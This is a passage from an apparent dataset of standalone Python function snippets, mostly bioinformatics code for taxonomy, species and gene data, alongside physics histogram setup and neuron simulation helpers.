f.write(unicode(json.dumps(all_ions, sort_keys=True, indent=4,\n separators=(',', ': '))))\n\n # Return\n return all_ions", "def gethists():\n histdict = {}\n\n lept_type = ['elect', 'muon']\n\n for lept in lept_type:\n histdict[\"h_misE_{}\".format(lept)] = TH1F('h_misE_{}'.format(lept), 'Gen/Reco missing energy comparison', 200, -70, 40)\n histdict[\"h_misPx_{}\".format(lept)] = TH1F('h_misPx_{}'.format(lept), 'Gen/Reco missing Px comparison', 200, -40, 40)\n histdict[\"h_misPy_{}\".format(lept)] = TH1F('h_misPy_{}'.format(lept), 'Gen/Reco missing Py comparison', 200, -40, 40)\n histdict[\"h_misPz_{}\".format(lept)] = TH1F('h_misPz_{}'.format(lept), 'Gen/Reco missing Pz comparison', 200, -50, 50)\n histdict[\"h_misP_{}\".format(lept)] = TH1F('h_misP_{}'.format(lept), 'Gen/Reco missing position comparison', 200, -30, 30)\n histdict[\"h_misM_{}\".format(lept)] = TH1F(\"h_misM_{}\".format(lept), 'Gen/Reco missing mass comparison', 200, -150, 50)\n histdict[\"h_leptE_{}\".format(lept)] = TH1F(\"h_leptE_{}\".format(lept), 'Gen/Reco lepton energy comparison', 200, -5, 5)\n histdict[\"h_leptTheta_{}\".format(lept)] = TH1F(\"h_leptTheta_{}\".format(lept), 'Gen theta lepton', 200, -5, 5)\n\n histdict[\"h_recoJetsAngle\"] = TH1F(\"h_recoJetsAngle\", 'Angle between the two reconstructed jets', 200, 0, 3.5)\n histdict[\"h_recoJetsTheta\"] = TH1F(\"h_recoJetsTheta\", 'Theta angles of the reconstructed jets', 200, -3.5, 3.5)\n histdict[\"h_recoJetEnergy\"] = TH1F(\"h_recoJetEnergy\", 'Energy of the reconstructed jets', 200, 0, 200)\n\n with_wo = ['FSR', 'woFSR']\n\n # for cut in with_wo:\n # histdict[\"h_ISR_E{}\".format(cut)] = TH1F(\"h_ISR_E{}\".format(cut), 'ISR energy', 200, -0, 150)\n # histdict[\"h_ISR_Theta{}\".format(cut)] = TH1F(\"h_ISR_Theta{}\".format(cut), 'ISR theta', 200, -1.6, 1.6)\n # histdict[\"h_ISR_pz{}\".format(cut)] = TH1F(\"h_ISR_pz{}\".format(cut), 'ISR pz', 200, -10, 10)\n\n # histdict[\"h_ISR_Theta_vs_E{}\".format(cut)] = TH2F(\"h_ISR_Theta_vs_E{}\".format(cut), 'ISR theta versus energy', 750, 0, 150, 200, -1.7, 1.7)\n # histdict[\"h_FSR_Theta_vs_E{}\".format(cut)] = TH2F(\"h_FSR_Theta_vs_E{}\".format(cut), 'FSR theta versus energy', 750, 0, 150, 200, -1.7, 1.7)\n\n histdict[\"h_FSR_E\"] = TH1F(\"h_FSR_E\", 'FSR energy', 200, -1, 5)\n histdict[\"h_FSR_Theta\"] = TH1F(\"h_FSR_Theta\", 'FSR theta', 200, -1.6, 1.6)\n histdict[\"h_FSR_pz\"] = TH1F(\"h_FSR_pz\", 'FSR pz', 200, -10, 10)\n\n # histdict[\"h_FSR_E_electrons\"] = TH1F(\"h_FSR_E_electrons\", 'energy FSR emitted by electrons', 200, -1, 5)\n # histdict[\"h_FSR_Theta_electrons\"] = TH1F(\"h_FSR_Theta_electrons\", 'theta FSR emited by the electrons', 200, -1.6, 1.6)\n # histdict[\"h_FSR_pz_electrons\"] = TH1F(\"h_FSR_pz_electrons\", 'pz FSR emited by the electrons ', 200, -10, 10)\n\n # histdict[\"h_FSR_E_muons\"] = TH1F(\"h_FSR_E_muons\", 'energy FSR emitted by muons', 200, -1, 5)\n # histdict[\"h_FSR_Theta_muons\"] = TH1F(\"h_FSR_Theta_muons\", 'theta FSR emited by the muons', 200, -1.6, 1.6)\n # histdict[\"h_FSR_pz_muons\"] = TH1F(\"h_FSR_pz_muons\", 'pz FSR emited by the muons ', 200, -10, 10)\n\n histdict[\"h_FSR_lepton_angle_vs_E\"] = TH2F(\"h_FSR_lepton_angle_vs_E\", 'Solid angle between the FSR photon and the lepton', 150, -1, 10, 150, 0, 3.17)\n histdict[\"h_E_p_vs_E_FSR\"] = TH2F(\"h_E_p_vs_E_FSRPhoton\", \"E/p ratio versus the FSR energy photon\", 220, -1, 10, 220, 0.9998, 1.0002)\n\n\n histdict[\"h_nonFSR_lepton_angle_vs_E\"] = TH2F(\"h_photons_lepton_angle_vs_E\", 'Solid angle between the non-FSR photons and the lepton', 150, -1, 10, 150, 0, 3.17)\n histdict[\"h_E_p_vs_E_nonFSR\"] = TH2F(\"h_E_p_vs_E_NonFSRPhoton\", \"E/p ratio versus the non-FSR energy photon\", 220, -1, 10, 220, 0.9998, 1.0002)\n\n histdict[\"h_test\"] = TH2F(\"h_test\", \"h_test\", 150, -1, 10, 150, 0, 3.17)\n return histdict", "def get_node_a(name, taxid, pathway, topology, psi_mi_to_sql_object):\n\n # Testing if the node is already in the database\n node_dict = psi_mi_to_sql_object.get_node(name, node_tax_id=taxid)\n\n if not node_dict:\n node_dict = {\n \"name\" : 'Uniprot:' + name,\n \"tax_id\": taxid,\n \"alt_accession\": None,\n 'pathways': pathway,\n \"aliases\": None,\n \"topology\": topology\n }\n\n return node_dict", "def test_make_otu_table_taxonomy(self):\r\n otu_map_lines = \"\"\"0\tABC_0\tDEF_1\r\n1\tABC_1\r\nx\tGHI_2\tGHI_3\tGHI_77\r\nz\tDEF_3\tXYZ_1\"\"\".split('\\n')\r\n taxonomy = {'0': ['Bacteria', 'Firmicutes'],\r\n 'x': ['Bacteria', 'Bacteroidetes']}\r\n obs = make_otu_table(\r\n otu_map_lines,\r\n taxonomy,\r\n constructor=DenseOTUTable)\r\n exp = \"\"\"{\"rows\": [{\"id\": \"0\", \"metadata\": {\"taxonomy\": [\"Bacteria\", \"Firmicutes\"]}}, {\"id\": \"1\", \"metadata\": {\"taxonomy\": [\"None\"]}}, {\"id\": \"x\", \"metadata\": {\"taxonomy\": [\"Bacteria\", \"Bacteroidetes\"]}}, {\"id\": \"z\", \"metadata\": {\"taxonomy\": [\"None\"]}}], \"format\": \"Biological Observation Matrix 0.9dev\", \"data\": [[1.0, 1.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0], [0.0, 0.0, 3.0, 0.0], [0.0, 1.0, 0.0, 1.0]], \"columns\": [{\"id\": \"ABC\", \"metadata\": null}, {\"id\": \"DEF\", \"metadata\": null}, {\"id\": \"GHI\", \"metadata\": null}, {\"id\": \"XYZ\", \"metadata\": null}], \"generated_by\": \"QIIME 1.4.0-dev, svn revision 2532\", \"matrix_type\": \"dense\", \"shape\": [4, 4], \"format_url\": \"http://biom-format.org\", \"date\": \"2011-12-21T00:19:30.961477\", \"type\": \"OTU table\", \"id\": null, \"matrix_element_type\": \"float\"}\"\"\"\r\n self.assertEqual(\r\n parse_biom_table(obs.split('\\n')),\r\n parse_biom_table(exp.split('\\n')))", "def generate_dictionary(self, lexicon):\n dictionary = {}\n for category, data in lexicon.iteritems():\n for form, gloss in data:\n dictionary.setdefault(form, []).append((gloss, category))\n return dictionary", "def _species(self, hdr):\n # Called PolyAtomic in OpenMIMS source\n d = {}\n\n d['numeric flag'], d['numeric value'], d['elements'], \\\n d['charges'], d['charge label'], d['label'] = \\\n unpack(self._bo + '4i c 64s', hdr.read(81))\n\n d['label'] = self._cleanup_string(d['label'])\n d['charge label'] = self._cleanup_string(d['charge label'])\n\n # OpenMIMS says 3 bytes AFTER el.table are unused; this is wrong,\n # 3 bytes BEFORE el.table (b 81-84) are unused. n_elements (here:\n # atomic number) is element number in periodic table rather than\n # number of elements. n_isotopes (here: isotope number) is offset from\n # main atomic Z number. Also: collapse ElementTable (Tabelts) into\n # main dict, too many layers.\n hdr.seek(3, 1)\n atoms = unpack(self._bo + '15i', hdr.read(60))\n d['atomic number'] = tuple(n for n in atoms[::3])\n d['isotope number'] = tuple(n for n in atoms[1::3])\n d['stoich number'] = tuple(n for n in atoms[2::3])\n return d", "def _get_all_oshapes(self):\n an_iname = self.node_list[0]\n an_inode = self.builder.nodes[an_iname]\n an_ishape = an_inode.oshapes['loc']\n \n return {'main' : an_ishape,\n 'loc' : an_ishape,\n 'cov' : an_ishape + [an_ishape[-1]]}", "def make_consensus_taxonomy(dict_taxs):\n dict_consensus = {}\n for read_id in dict_taxs:\n hits = dict_taxs[read_id]['hits']\n taxonomy = dict_taxs[read_id]['taxonomy']\n first_taxonomy = taxonomy[0] # take first taxonomy list of the list, will be used to fill tax fields\n length_taxonomy = len(first_taxonomy)\n if hits == 1: # only one taxonomy, no problem here\n dict_consensus[read_id] = first_taxonomy\n elif hits > 1: # more than one hit, a consensus has to be reached\n dict_consensus[read_id] = [] # open empty list, it will be filled after\n check_list = [] # list to store the output of tax comparisons\n for taxs in zip(*taxonomy): # create an iterable that gives all entries for each position of the taxonomy lists\n check = len(set(taxs)) == 1 # if the iterable is length 1, all taxs agree. If it's larger, there's not an agreement\n check_list.append(check) # append comparison results to previosuly opened list\n try:\n first_true = check_list.index(True) # look for first position where there is a True\n if first_true != 0:\n dict_consensus[read_id].extend(first_true * ['NA']) # add as many NA's as Falses are before first True\n dict_consensus[read_id].extend(first_taxonomy[first_true:]) # from first True on, add the taxonomy\n else: # if first true is 0, taxs should be exactly the same\n dict_consensus[read_id] = first_taxonomy\n except ValueError: # it fires when there's not a single True, so there's no consensus. The read is totally ambiguous\n dict_consensus[read_id].extend(length_taxonomy*['NA'])\n total_reads = len(dict_consensus)\n return dict_consensus, length_taxonomy, total_reads", "def taxonomy_plot(self,seasons):\n print('Formatting data.')\n no_of_ideograms=self.taxonomy_files()\n location=self.place.capitalize()+'-'+str(self.year)\n if seasons==True:\n seasons=self.weather.seasons(self.place)\n print('Done')\n self.conf.taxo_conf(no_of_ideograms, location, self.start_level, self.plot_level, seasons)", "def make_global_state(self, shreds_tags):\n doc_counts = collections.defaultdict(int)\n\n for doc, tags in shreds_tags.items():\n for tag in tags:\n doc_counts[tag] += 1\n\n num_docs = float(len(shreds_tags))\n\n idf = {}\n for tag, count in doc_counts.items():\n idf[tag] = math.log(num_docs / count)\n return {\n 'idf_map': idf,\n 'all_terms': sorted(idf.keys()),\n }", "def initialize_output_dict(self, label: Optional[str] = None):\n if label is not None or not self._does_output_dict_contain_info():\n for species in self.species_list:\n if label is None or species.label == label:\n if species.label not in self.output:\n self.output[species.label] = dict()\n if 'paths' not in self.output[species.label]:\n self.output[species.label]['paths'] = dict()\n path_keys = ['geo', 'freq', 'sp', 'composite']\n for key in path_keys:\n if key not in self.output[species.label]['paths']:\n self.output[species.label]['paths'][key] = ''\n if 'irc' not in self.output[species.label]['paths'] and species.is_ts:\n self.output[species.label]['paths']['irc'] = list()\n if 'job_types' not in self.output[species.label]:\n self.output[species.label]['job_types'] = dict()\n for job_type in list(set(self.job_types.keys())) + ['opt', 'freq', 'sp', 'composite', 'onedmin']:\n if job_type in ['rotors', 'bde']:\n # rotors could be invalidated due to many reasons,\n # also could be falsely identified in a species that has no torsional modes.\n self.output[species.label]['job_types'][job_type] = True\n else:\n self.output[species.label]['job_types'][job_type] = False\n keys = ['conformers', 'isomorphism', 'convergence', 'restart', 'errors', 'warnings', 'info']\n for key in keys:\n if key not in self.output[species.label]:\n if key == 'convergence':\n self.output[species.label][key] = None\n else:\n self.output[species.label][key] = ''", "def reindex_subcomponent_taxa(self):\n ti_mutable = self.taxon_set._is_mutable\n self.taxon_set._is_mutable = True\n new_map = CharacterDataMap()\n for taxon, seq in self.taxon_seq_map.items():\n taxon = self.taxon_set.require_taxon(label=taxon.label)\n new_map[taxon] = seq\n self.taxon_set._is_mutable = ti_mutable\n self.taxon_seq_map = new_map", "def nsrGenera(taxonList, synonymList):\r\n species = list(filter(None, sorted(taxonList + synonymList)))\r\n generaList = [i.split()[0] for i in species]\r\n generaList = list(dict.fromkeys(generaList))\r\n return generaList", "def read_from_tree(self, tree, warnings=True):\n\n if isinstance(tree, str):\n tree = dendropy.Tree.get_from_path(tree,\n schema='newick',\n rooting=\"force-rooted\",\n preserve_underscores=True)\n\n taxonomy = {}\n for leaf in tree.leaf_node_iter():\n taxa = []\n\n node = leaf.parent_node\n while node:\n if node.label:\n taxa_str = node.label\n if ':' in taxa_str:\n taxa_str = taxa_str.split(':')[1]\n\n if not is_float(taxa_str):\n if taxa_str[-1] == ';':\n taxa_str = taxa_str[:-1]\n\n # check for concatenated ranks of the form: p__Crenarchaeota__c__Thermoprotei\n for prefix in Taxonomy.rank_prefixes:\n split_str = '__' + prefix\n if split_str in taxa_str:\n taxa_str = taxa_str.replace(split_str, ';' + prefix)\n\n # appears to be an internal label and not simply a support value\n taxa = [x.strip() for x in taxa_str.split(';')] + taxa\n node = node.parent_node\n\n if warnings and len(taxa) > 7:\n self.logger.warning(\n 'Invalid taxonomy string read from tree for taxon %s: %s' % (leaf.taxon.label, ';'.join(taxa)))\n\n # check if genus name should be appended to species label\n if len(taxa) == 7:\n genus = taxa[5][3:]\n species = taxa[6][3:]\n if genus not in species and len(species.split()) == 1:\n taxa[6] = 's__' + genus + ' ' + species\n\n taxa = self.fill_trailing_ranks(taxa)\n taxonomy[leaf.taxon.label] = taxa\n\n return taxonomy", "def create_from_reactome_mapping(mappings: str, species: str = \"Homo sapiens\"):\n pathways = dict()\n pathway_names = dict()\n\n mapping_lines = mappings.split(\"\\n\")\n\n for mapping in mapping_lines:\n mapping = mapping.strip()\n\n # ignore empty lines\n if len(mapping) == 0:\n continue\n\n fields = mapping.split(\"\\t\")\n\n if len(fields) < 6:\n raise SyntaxError(\"Invalid mapping specification passed. Must contain at least 6 fields.\")\n\n molecule_id = fields[0]\n pathway_id = fields[1]\n pathway_name = fields[3]\n pathway_species = fields[5]\n\n if pathway_species != species:\n continue\n\n if pathway_id not in pathways:\n pathways[pathway_id] = set()\n pathway_names[pathway_id] = pathway_name\n\n pathways[pathway_id].add(molecule_id)\n\n # create the GeneSet object\n return GeneSet(gene_sets=pathways, gene_set_names=pathway_names)", "def fetch_by_id(self, taxon):\n res = self.ensembl.get_taxonomy_by_id(taxon)\n return res", "def _parse_id_to_taxonomy_file(f):\r\n result = {}\r\n for line in f:\r\n line = line.strip()\r\n if line:\r\n identifier, taxonomy = map(strip, line.split('\\t'))\r\n result[identifier] = taxonomy\r\n return result", "def parse_orthologs(self):\n counted_orthologs = {}\n for file in glob(f'{self.ortholog_folder}/*.fas'):\n for record in SeqIO.parse(file, 'fasta'):\n if record.description not in counted_orthologs:\n counted_orthologs[record.description] = 1\n else:\n counted_orthologs[record.description] += 1\n return counted_orthologs", "def createEmptyMapData():\n with open('data/taxzone.json', 'r') as f:\n taxzones = json.load(f)\n\n polygons_shape = [shape(feature['geometry']) for feature in taxzones['features']]\n names = [feature['properties']['id'] for feature in taxzones['features']]\n map_data = pd.DataFrame({'poly': polygons_shape, 'id': names})\n\n return map_data", "def build_tree(self, genes_share_one_alignment):\r\n species_name = self.species\r\n fun_built_tree = getattr(SSTree, species_name)\r\n return fun_built_tree(genes_share_one_alignment)", "def _get_hists(ds):\n hists = {}\n for name, ds in ds.items():\n try:\n hists[name] = Hist(ds)\n except HistError:\n hists[name] = _get_hists(ds)\n return hists", "def extract_tax_ids_from_species(species_file):\n\n tax_ids = {}\n seen_ga = False\n\n fp = open(species_file, 'r')\n\n for line in fp:\n # if not a comment line\n if line[0] != '#' and not seen_ga:\n line = line.strip().split()\n\n if line[3] not in tax_ids:\n if line[5] != '-':\n tax_ids[line[3]] = int(line[5])\n\n elif line.find(\"CURRENT GA THRESHOLD:\") != -1:\n seen_ga = True\n\n fp.close()\n\n return tax_ids", "def test_make_compatible_taxa_summaries_sample_id_map(self):\r\n exp = ((['Even7', 'Even8'], ['Eukarya'], array([[1., 1.]])),\r\n (['Even1', 'Even2'], ['Eukarya'], array([[0.5, 0.6]])))\r\n obs = _make_compatible_taxa_summaries(self.taxa_summary3,\r\n self.taxa_summary4, self.sample_id_map1)\r\n self.compare_multiple_level_array(obs, exp)", "def serotype_escherichia(metadata, analysistype):\n for sample in metadata:\n # Initialise negative results to be overwritten when necessary\n sample[analysistype].best_o_pid = '-'\n sample[analysistype].o_genes = ['-']\n sample[analysistype].o_set = ['-']\n sample[analysistype].best_h_pid = '-'\n sample[analysistype].h_genes = ['-']\n sample[analysistype].h_set = ['-']\n if sample.general.bestassemblyfile != 'NA':\n if sample.general.closestrefseqgenus in ['Escherichia', 'Shigella']:\n o = dict()\n h = dict()\n for result, percentid in sample[analysistype].blastresults.items():\n if 'O' in result.split('_')[-1]:\n o.update({result: float(percentid)})\n if 'H' in result.split('_')[-1]:\n h.update({result: float(percentid)})\n # O\n try:\n sorted_o = sorted(o.items(), key=operator.itemgetter(1), reverse=True)\n sample[analysistype].best_o_pid = str(sorted_o[0][1])\n\n sample[analysistype].o_genes = [gene for gene, pid in o.items()\n if str(pid) == sample[analysistype].best_o_pid]\n sample[analysistype].o_set = \\\n list(set(gene.split('_')[-1] for gene in sample[analysistype].o_genes))\n except (KeyError, IndexError):\n pass\n # H\n try:\n sorted_h = sorted(h.items(), key=operator.itemgetter(1), reverse=True)\n sample[analysistype].best_h_pid = str(sorted_h[0][1])\n sample[analysistype].h_genes = [gene for gene, pid in h.items()\n if str(pid) == sample[analysistype].best_h_pid]\n sample[analysistype].h_set = \\\n list(set(gene.split('_')[-1] for gene in sample[analysistype].h_genes))\n except (KeyError, IndexError):\n pass\n return metadata", "def createSpecies(self):\n return _libsbml.Model_createSpecies(self)", "def get_taxa(taxa_fname, sample_ids):\n try:\n lines = open(taxa_fname, 'U').readlines()\n except (TypeError, IOError):\n raise MissingFileError, 'Taxa summary file required for this analysis'\n map = parse_mapping_file(lines)\n return map", "def init_gene():\n gene_details=dict(\n id = '', \n anno_id = [],\n confgenes_id = [],\n name = '',\n source = '',\n gene_info = {},\n alias = '',\n name2 = [],\n strand = '',\n chr = '',\n chr_num = [],\n paralogs = [],\n start = '',\n stop = '',\n transcripts = [],\n transcript_info = [],\n transcript_status = [],\n transcript_valid = [],\n exons = [],\n exons_confirmed = [],\n cds_exons = [],\n utr5_exons = [],\n utr3_exons = [],\n tis = [],\n tis_conf = [],\n tis_info = [],\n cdsStop = [],\n cdsStop_conf = [],\n cdsStop_info = [],\n tss = [],\n tss_info = [],\n tss_conf = [],\n cleave = [],\n cleave_info = [],\n cleave_conf = [],\n polya = [],\n polya_info = [],\n polya_conf = [],\n is_alt = [],\n is_alt_spliced = 0,\n is_valid = [],\n transcript_complete = [],\n is_complete = [],\n is_correctly_gff3_referenced = '',\n splicegraph = []\n )\n return gene_details", "def write_taxon_item(tax: TMB_Classes.RankedTaxonClass, ind: str) -> None:\n # starttag, endtag = rank_tags(tax.taxon_rank)\n # outfile.write(ind + \"<li><a href=\\\"#{}\\\">{} {}{}{}</a>\".format(taxon_link(tax), tax.taxon_rank.capitalize(),\n # starttag, tax.name, endtag))\n outfile.write(ind + \"<li>\" + create_taxon_link(tax.taxon_rank, tax.name, do_print, same_page=True) + \"\\n\")\n outfile.write(ind + \" <ul>\\n\")\n if tax.n_children() > 0:\n for cc in sorted(tax.children):\n write_taxon_item(cc, ind + 4 * \" \")\n else:\n ssplist = []\n for ss in specieslist:\n if tax.taxon_rank == \"genus\":\n if ss.genus == tax.name:\n ssplist.append(create_species_link(ss.genus, ss.species, do_print, status=ss.status))\n elif tax.taxon_rank == \"subgenus\":\n if ss.subgenus == tax.name:\n ssplist.append(create_species_link(ss.genus, ss.species, do_print, status=ss.status))\n outfile.write(ind + \" <li>\" + \", \".join(ssplist) + \"</li>\\n\")\n outfile.write(ind + \" </ul>\\n\")\n outfile.write(ind + \"</li>\\n\")", "def create_taxon_to_state_set_map(self, char_indices=None):\n taxon_to_state_indices = {}\n for t in self.taxon_seq_map.keys():\n cdv = self[t]\n if char_indices is None:\n ci = range(len(cdv))\n else:\n ci = char_indices\n v = []\n for char_index in ci:\n cell = cdv[char_index]\n cell_value = cell.value\n try:\n state_alphabet = cell.character_type.state_alphabet\n except AttributeError:\n state_alphabet = self.default_state_alphabet\n inds = [state_alphabet.index(i) for i in cell_value.fundamental_states]\n v.append(set(inds))\n taxon_to_state_indices[t] = v\n return taxon_to_state_indices", "def get_taxonomy_results(filepath):\n taxonomy_results = {}\n with open(filepath, \"r\") as f:\n reader = csv.DictReader(f, delimiter=';')\n for row in reader:\n result = row[\"Result\"]\n taxonomy_results.setdefault(result, {})\n taxonomy_results[result][\"description\"] = row[\"Description\"]\n return taxonomy_results", "def test_map_ids_to_taxonomy(self):\r\n p = BlastTaxonAssigner({})\r\n id_to_taxonomy_map = {\r\n \"AY800210\": \"Archaea;Euryarchaeota;Halobacteriales;uncultured\",\r\n \"EU883771\":\r\n \"Archaea;Euryarchaeota;Methanomicrobiales;Methanomicrobium et rel.\",\r\n \"EF503699\": \"Archaea;Crenarchaeota;uncultured;uncultured\",\r\n \"DQ260310\":\r\n \"Archaea;Euryarchaeota;Methanobacteriales;Methanobacterium\",\r\n \"EF503697\": \"Archaea;Crenarchaeota;uncultured;uncultured\",\r\n }\r\n hits = {\r\n 's1': (\"AY800210\", 1e-99),\r\n 's5': (\"EU883771\", 'weird confidence value'),\r\n 's3': (\"DQ260310\", 42.),\r\n 's4': None,\r\n }\r\n expected = {\r\n 's1':\r\n (\"Archaea;Euryarchaeota;Halobacteriales;uncultured\",\r\n 1e-99, \"AY800210\"),\r\n 's5': ('Archaea;Euryarchaeota;Methanomicrobiales;Methanomicrobium et rel.',\r\n 'weird confidence value', \"EU883771\"),\r\n 's3':\r\n (\"Archaea;Euryarchaeota;Methanobacteriales;Methanobacterium\",\r\n 42., \"DQ260310\"),\r\n 's4': ('No blast hit', None, None),\r\n }\r\n actual = p._map_ids_to_taxonomy(hits, id_to_taxonomy_map)\r\n self.assertEqual(actual, expected)", "def testMakeNewSpecies(self):\n\n # adding 3 unique species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().fromSMILES('[OH]'), \n Species().fromSMILES('CC'),\n Species().fromSMILES('[CH3]')]\n\n for spc in spcs:\n cerm.makeNewSpecies(spc)\n\n self.assertEquals(len(cerm.speciesDict), len(spcs)) \n self.assertEquals(len(cerm.indexSpeciesDict), len(spcs))\n\n # adding 3 unique, and 1 already existing species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().fromSMILES('[OH]'), \n Species().fromSMILES('CC'),\n Species().fromSMILES('[CH3]'),\n Species().fromSMILES('CC')]#duplicate species\n\n for spc in spcs:\n cerm.makeNewSpecies(spc)\n\n self.assertEquals(len(cerm.speciesDict), len(spcs) - 1) \n self.assertEquals(len(cerm.indexSpeciesDict), len(spcs) - 1)", "def test_write_add_taxa_summary_mapping(self):\r\n write_add_taxa_summary_mapping(self.add_taxa_summary,\r\n self.add_taxa_order,\r\n self.add_taxa_mapping,\r\n self.add_taxa_header,\r\n self.tmp_fp1)\r\n obs = open(self.tmp_fp1).read()\r\n exp = '\\n'.join(['#sample_id\\tfoo\\tbar\\ta;b;c\\td;e;f',\r\n 's1\\tsomething1\\tsomething2\\t1\\t2',\r\n 's2\\tsomething3\\tsomething4\\t3\\t4\\n'])\r\n self.assertEqual(obs, exp)\r\n self.files_to_remove.append(self.tmp_fp1)", "def AddTreeTerm(con, cur, termid, parentid, ontologynameid, commit=True):\n try:\n # test if already exists\n cur.execute('SELECT uniqueId FROM OntologyTreeStructureTable WHERE (ontologyId=%s AND ontologyParentId=%s AND ontologyNameId=%s) LIMIT 1', [termid, parentid, ontologynameid])\n if cur.rowcount > 0:\n sid = cur.fetchone()[0]\n debug(2, 'Tree entry exists (%d). returning it' % sid)\n return '', sid\n # does not exist - lets add it\n cur.execute('INSERT INTO OntologyTreeStructureTable (ontologyId,ontologyParentId,ontologyNameId) VALUES (%s,%s,%s) RETURNING uniqueId', [termid, parentid, ontologynameid])\n sid = cur.fetchone()[0]\n return '', sid\n except psycopg2.DatabaseError as e:\n debug(7, \"error %s enountered in ontology.AddTreeTerm\" % e)\n return \"error %s enountered in ontology.AddTreeTerm\" % e, -2", "def setup_openpmd_species_record( self, grp, quantity ):\n # Generic setup\n self.setup_openpmd_record( grp, quantity )\n\n # Weighting information\n grp.attrs[\"macroWeighted\"] = macro_weighted_dict[quantity]\n grp.attrs[\"weightingPower\"] = weighting_power_dict[quantity]", "def get_taxa(self, **kwargs):\n if \"oids\" not in kwargs and \"labels\" not in kwargs:\n raise TypeError(\"Need to specify taxa oid's or labels\")\n oids = kwargs.get(\"oids\", [])\n labels = kwargs.get(\"labels\", [])\n taxa = []\n for oid in oids:\n t = self.get_taxon(oid=oid)\n if t:\n taxa.append(t)\n for label in labels:\n t = self.get_taxon(label=label)\n if t:\n taxa.append(t)\n return taxa", "def test_make_new_species(self):\n\n # adding 3 unique species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().from_smiles('[OH]'),\n Species().from_smiles('CC'),\n Species().from_smiles('[CH3]')]\n\n for spc in spcs:\n cerm.make_new_species(spc)\n\n self.assertEquals(len(cerm.species_dict), len(spcs))\n self.assertEquals(len(cerm.index_species_dict), len(spcs))\n\n # adding 3 unique, and 1 already existing species:\n cerm = CoreEdgeReactionModel()\n\n spcs = [Species().from_smiles('[OH]'),\n Species().from_smiles('CC'),\n Species().from_smiles('[CH3]'),\n Species().from_smiles('CC')] # duplicate species\n\n for spc in spcs:\n cerm.make_new_species(spc)\n\n self.assertEquals(len(cerm.species_dict), len(spcs) - 1)\n self.assertEquals(len(cerm.index_species_dict), len(spcs) - 1)", "def new_taxon_set(ntax=10, label_func=None):\n taxon_set = TaxonSet()\n if label_func is None:\n label_idx_length = int(math.log(ntax, 10)) + 1\n label_template = \"T%%0%dd\" % (label_idx_length)\n label_func = lambda x: label_template % x\n for i in range(ntax):\n taxon_set.new_taxon(label=label_func(i+1))\n return taxon_set", "def createSpeciesType(self):\n return _libsbml.Model_createSpeciesType(self)", "def _init_dictionaries(self):\n\t\t# Dictionary contatining all actionPotential\n\t\tself.actionPotentials = {}\n\t\t# Dictionary containing all cells id.\n\t\t# Cells id are used by neuron to communicate synapses between different cells in different hosts. Ids (gids) can be any integer, they just need to be unique.\n\t\tself.cellsId = {}\n\t\t# Dictionary containing all cells\n\t\tself.cells = {}\n\n\t\tself._nMuscles = len(self._infoMuscles)\n\t\tfor muscle,muscAfferentDelay in self._infoMuscles:\n\t\t\t# Create sub-dictionaries for all DoF\n\t\t\tself.actionPotentials[muscle]={}\n\t\t\tself.cellsId[muscle]={}\n\t\t\tself.cells[muscle]={}\n\t\t\tfor cellInfo in self._infoCommonCellsInMuscles:\n\t\t\t\t# add lists containing cell ids/cells/ap\n\t\t\t\tcellClass = cellInfo[0]\n\t\t\t\tcellName = cellInfo[1]\n\t\t\t\tself.cellsId[muscle][cellName]=[]\n\t\t\t\tself.cells[muscle][cellName]=[]\n\t\t\t\tif (cellClass==\"Motoneuron\" or cellClass==\"IntFireMn\") and self.recordMotoneurons:\n\t\t\t\t\tself.actionPotentials[muscle][cellName]=[]\n\t\t\t\telif cellClass==\"AfferentFiber\" and self.recordAfferents:\n\t\t\t\t\tself.actionPotentials[muscle][cellName]=[]\n\t\t\t\telif cellClass==\"IntFire\" and self.recordIntFire:\n\t\t\t\t\tself.actionPotentials[muscle][cellName]=[]\n\n\t\t# Add special cells (specifc for some muscles or not muscle related)\n\t\tfor cellInfo in self._infoSpecialCells:\n\t\t\tgroupOrMuscle = cellInfo[0]\n\t\t\tcellClass = cellInfo[1]\n\t\t\tcellName = cellInfo[2]\n\t\t\tif not groupOrMuscle in self.cellsId.keys():\n\t\t\t\tself.actionPotentials[groupOrMuscle]={}\n\t\t\t\tself.cellsId[groupOrMuscle]={}\n\t\t\t\tself.cells[groupOrMuscle]={}\n\n\t\t\tself.cellsId[groupOrMuscle][cellName]=[]\n\t\t\tself.cells[groupOrMuscle][cellName]=[]\n\t\t\tif (cellClass==\"Motoneuron\" or cellClass==\"IntFireMn\") and self.recordMotoneurons:\n\t\t\t\tself.actionPotentials[groupOrMuscle][cellName]=[]\n\t\t\telif cellClass==\"AfferentFiber\" and self.recordAfferents:\n\t\t\t\tself.actionPotentials[groupOrMuscle][cellName]=[]\n\t\t\telif cellClass==\"IntFire\" and self.recordIntFire:\n\t\t\t\tself.actionPotentials[groupOrMuscle][cellName]=[]", "def create_objects(cls, table):\n x = 2\n state = State(table[1][4])\n while x < len(table):\n line = table[x]\n if line[5] == \"powiat\" or line[5] == \"miasto na prawach powiatu\":\n county = County(line[4], line[1])\n state.in_state(county)\n elif line[5] == \"miasto\":\n city = City(line[4], line[1], line[2])\n state.in_state(city)\n elif line[5] == \"gmina miejska\":\n city_community = City_Community(line[4], line[1], line[2])\n state.in_state(city_community)\n elif line[5] == \"gmina wiejska\":\n village_community = Village_Community(line[4], line[1], line[2])\n state.in_state(village_community)\n elif line[5] == \"gmina miejsko-wiejska\":\n city_village_community = City_Village_Community(line[4], line[1], line[2])\n state.in_state(city_village_community)\n elif line[5] == \"obszar wiejski\":\n village_square = Village_square(line[4], line[1], line[2])\n state.in_state(village_square)\n elif line[5] == \"delegatura\":\n delagacy = Delegacy(line[4], line[1], line[2])\n state.in_state(delagacy)\n x+=1\n\n for county in state.in_s:#adding community objects to a proper county\n if type(county) == County:\n for community in state.in_s:\n if community.county_number == county.county_number and type(community) != County:\n county.in_county(community)\n\n return state", "def generate_armour_type_dicts(armour_types_dict: dict):\n troops_to_armour_types_dict = {}\n\n for armour_type, troops in armour_types_dict.items():\n for troop in troops:\n if troop not in troops_to_armour_types_dict:\n troops_to_armour_types_dict[troop] = armour_type\n joint_dict = {\"armourTypeToTroops\": armour_types_dict,\n \"troopsToArmourType\": troops_to_armour_types_dict}\n return joint_dict", "def parse_taxonomy_to_otu_metadata(\r\n lines, labels=['taxonomy', 'score'], process_fs=[taxa_split, float]):\r\n result = 